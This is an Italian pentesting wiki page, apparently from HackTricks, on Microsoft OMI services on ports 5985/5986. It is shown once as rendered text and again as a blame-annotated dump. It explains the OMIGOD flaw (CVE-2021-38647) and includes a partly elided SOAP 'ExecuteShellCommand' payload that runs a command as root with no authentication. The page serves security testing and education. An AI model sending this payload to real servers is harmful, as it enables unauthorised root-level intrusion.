hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

# 5985,5986 - Pentesting OMI

<details>

<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la tua **azienda pubblicizzata in HackTricks**? o vuoi avere accesso all'**ultima versione di PEASS o scaricare HackTricks in PDF**? Controlla i [**PACCHETTI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

### **Informazioni di base**

**OMI** viene presentato come uno strumento **[open-source](https://github.com/microsoft/omi)** da Microsoft, progettato per la gestione della configurazione remota. È particolarmente rilevante per i server Linux su Azure che utilizzano servizi come:

- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**

Il processo `omiengine` viene avviato e ascolta su tutte le interfacce come root quando questi servizi vengono attivati.

Le porte predefinite utilizzate sono **5985** (http) e **5986** (https).

### **[Vulnerabilità CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**

Come osservato il 16 settembre, i server Linux implementati in Azure con i servizi menzionati sono suscettibili a causa di una versione vulnerabile di OMI. Questa vulnerabilità risiede nella gestione dei messaggi del server OMI tramite l'endpoint `/wsman` senza richiedere un'intestazione di autenticazione, autorizzando erroneamente il client.

Un attaccante può sfruttare ciò inviando un payload SOAP "ExecuteShellCommand" senza un'intestazione di autenticazione, costringendo il server ad eseguire comandi con privilegi di root.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Per ulteriori informazioni su questa CVE **[controlla qui](https://github.com/horizon3ai/CVE-2021-38647)**.

## Riferimenti

* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)

<details>

<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Lavori in una **azienda di sicurezza informatica**? Vuoi vedere la tua **azienda pubblicizzata su HackTricks**? O vuoi avere accesso all'**ultima versione di PEASS o scaricare HackTricks in PDF**? Controlla i [**PACCHETTI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* **Unisciti al** [**💬**](https://emojipedia.org/speech-balloon/) [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguimi** su **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
GitBook: [#3477] No subject 2022-09-09 16:14:55 +00:00			`# 5985,5986 - Pentesting OMI`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Italian 2024-02-10 13:03:23 +00:00			`<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`* Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i [PACCHETTI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
			`* Scopri [The PEASS Family](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [NFT](https://opensea.io/collection/the-peass-family)`
			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Unisciti al [💬](https://emojipedia.org/speech-balloon/) [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo Telegram](https://t.me/peass) o seguimi su Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Italian 2024-02-10 13:03:23 +00:00			`### Informazioni di base`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`OMI viene presentato come uno strumento [open-source](https://github.com/microsoft/omi) da Microsoft, progettato per la gestione della configurazione remota. È particolarmente rilevante per i server Linux su Azure che utilizzano servizi come:`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
a 2024-02-08 21:36:35 +00:00			`- Azure Automation`
			`- Azure Automatic Update`
			`- Azure Operations Management Suite`
			`- Azure Log Analytics`
			`- Azure Configuration Management`
			`- Azure Diagnostics`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			Il processo `omiengine` viene avviato e ascolta su tutte le interfacce come root quando questi servizi vengono attivati.
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Le porte predefinite utilizzate sono 5985 (http) e 5986 (https).`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`### [Vulnerabilità CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			Come osservato il 16 settembre, i server Linux implementati in Azure con i servizi menzionati sono suscettibili a causa di una versione vulnerabile di OMI. Questa vulnerabilità risiede nella gestione dei messaggi del server OMI tramite l'endpoint `/wsman` senza richiedere un'intestazione di autenticazione, autorizzando erroneamente il client.
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Un attaccante può sfruttare ciò inviando un payload SOAP "ExecuteShellCommand" senza un'intestazione di autenticazione, costringendo il server ad eseguire comandi con privilegi di root.`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00			```xml
			`<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"`
Translated to Italian 2024-02-10 13:03:23 +00:00			`...`
			`<s:Body>`
			`<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">`
			`<p:command>id</p:command>`
			`<p:timeout>0</p:timeout>`
			`</p:ExecuteShellCommand_INPUT>`
			`</s:Body>`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00			`</s:Envelope>`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`Per ulteriori informazioni su questa CVE [controlla qui](https://github.com/horizon3ai/CVE-2021-38647).`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`## Riferimenti`
GitBook: [#2980] No subject 2022-02-02 14:36:35 +00:00
			`* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)`
			`* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Italian 2024-02-10 13:03:23 +00:00			`<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`* Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata su HackTricks? O vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i [PACCHETTI DI ABBONAMENTO](https://github.com/sponsors/carlospolop)!`
			`* Scopri [The PEASS Family](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [NFT](https://opensea.io/collection/the-peass-family)`
			`* Ottieni il [merchandising ufficiale di PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Unisciti al [💬](https://emojipedia.org/speech-balloon/) [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo Telegram](https://t.me/peass) o seguimi su Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Condividi i tuoi trucchi di hacking inviando PR al [repo hacktricks](https://github.com/carlospolop/hacktricks) e al [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`